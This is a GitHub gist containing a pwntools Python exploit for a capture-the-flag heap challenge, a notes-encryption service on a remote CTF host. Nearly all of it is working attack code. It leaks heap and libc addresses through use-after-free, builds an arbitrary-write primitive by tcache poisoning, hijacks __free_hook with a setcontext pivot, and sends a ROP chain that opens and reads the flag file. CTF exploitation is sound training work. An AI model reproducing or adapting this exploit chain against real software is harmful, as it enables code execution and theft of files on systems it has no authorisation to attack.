Created
December 14, 2020 19:04
-
-
Save hkraw/00b76bcad669f89039288a3ed1c9b3fb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
from pwn import * | |
from past.builtins import xrange | |
from time import sleep | |
from binascii import hexlify, unhexlify | |
import subprocess | |
import random | |
# Utils | |
def Encrypt(index,note=None,data=None): | |
io.sendlineafter('> ','1') | |
io.sendlineafter('Index: ',f'{index}') | |
io.sendafter('Note: ',note) | |
io.sendafter('Text: ',data) | |
def Decrypt(index): | |
io.sendlineafter('> ','2') | |
io.sendlineafter('Index: ',f'{index}') | |
def Edit(index,newnote=None,newdata=None): | |
io.sendlineafter('> ','3') | |
io.sendlineafter('Index: ',f'{index}') | |
io.sendafter('New note: ',newnote) | |
io.sendafter('New text: ',newdata) | |
def Delete(index): | |
io.sendlineafter('> ','4') | |
io.sendlineafter('Index: ',f'{index}') | |
def Arbwrite(what,where,heap_base): | |
Encrypt(0,note='A',data='A') | |
Encrypt(1,note='A',data='A') | |
Delete(1) | |
Delete(0) | |
Edit(0,newnote=p64(heap_base+0xe80),newdata='A') | |
Encrypt(0,'A','A') | |
Encrypt(0,note=p64(where),data='A') | |
Edit(2,newnote=p64(what),newdata='A') | |
# Addr | |
libc_leak_offset = 0x1ecf60 | |
__free_hook = 0x1eeb28 | |
setcontext = 0x580a0 | |
# Gadgets | |
L_SYSCALL = 0x000e7559 | |
L_POP_RDI = 0x0015b427 | |
L_POP_RSI = 0x0014d1da | |
L_POP_RDX = 0x00162866 # pop rdx ; pop xxx ; ret | |
L_POP_RAX = 0x00112cfb | |
# Hack | |
def Hack(): | |
global io | |
Encrypt(0,note='A'*0x8,data='A'*0x8) #0 | |
Encrypt(1,note='A'*0x8,data='B'*0x8) #1 | |
Encrypt(2,note='B'*0x8,data='C'*0x8) #2 | |
Delete(0) | |
Decrypt(0) | |
io.recvuntil('): ') | |
heap_base = u64(unhexlify(io.recvline().strip()))-0xf00 | |
print(hex(heap_base)) | |
Edit(0,newnote=p64(heap_base+0xe80),newdata='\n') | |
Encrypt(0,note='A'*0x8,data='A') | |
Encrypt(3,note=p64(heap_base+0x650),data='A') | |
Decrypt(2) | |
io.recvuntil('): ') | |
libc_leak = u64(unhexlify(io.recvline().strip())) | |
libc_base = libc_leak - libc_leak_offset | |
print(hex(libc_base)) | |
Encrypt(5,'A','A') #heap base + 0x1130 | |
#0x00154930: mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20] ; (1 found) | |
Arbwrite(what=heap_base+0x1168,where=heap_base+0x1178,heap_base=heap_base) | |
Arbwrite(what=libc_base+setcontext+61,where=heap_base+0x1188,heap_base=heap_base) | |
Arbwrite(what=heap_base+0x2000,where=heap_base+0x1168+0xa0,heap_base=heap_base) | |
Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x1160+0xb0,heap_base=heap_base) | |
Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x2000+0x8,heap_base=heap_base) | |
Arbwrite(what=libc_base+L_POP_RSI,where=heap_base+0x2000+0x18,heap_base=heap_base) | |
Arbwrite(what=heap_base+0x2000,where=heap_base+0x2000+0x20,heap_base=heap_base) | |
Arbwrite(what=libc_base+L_POP_RDX,where=heap_base+0x2000+0x28,heap_base=heap_base) | |
Arbwrite(what=0x1000,where=heap_base+0x2000+0x30,heap_base=heap_base) | |
Arbwrite(what=0x1000,where=heap_base+0x2000+0x38,heap_base=heap_base) | |
Arbwrite(what=libc_base+L_SYSCALL,where=heap_base+0x2000+0x40,heap_base=heap_base) | |
Arbwrite(what=libc_base+0x154930,where=libc_base+__free_hook,heap_base=heap_base) | |
Delete(5) | |
L_ROP = b'/home/ctf/flag.txt\0'.ljust(0x48,b'\0')+\ | |
p64(libc_base+L_POP_RDI)+p64(heap_base+0x2000)+\ | |
p64(libc_base+L_POP_RSI)+p64(0)+\ | |
p64(libc_base+L_POP_RDX)+p64(0x100)+p64(0)+\ | |
p64(libc_base+L_POP_RAX)+p64(0x2)+\ | |
p64(libc_base+L_SYSCALL)+\ | |
p64(libc_base+L_POP_RDI)+p64(3)+\ | |
p64(libc_base+L_POP_RSI)+p64(heap_base)+\ | |
p64(libc_base+L_POP_RAX)+p64(0)+\ | |
p64(libc_base+L_SYSCALL)+\ | |
p64(libc_base+L_POP_RAX)+p64(1)+\ | |
p64(libc_base+L_POP_RDI)+p64(1)+\ | |
p64(libc_base+L_SYSCALL) | |
io.send(L_ROP) | |
# Pwn | |
if __name__=='__main__': | |
# io = process('./chall') | |
io = remote('challs.xmas.htsp.ro', 2007) | |
Hack() | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment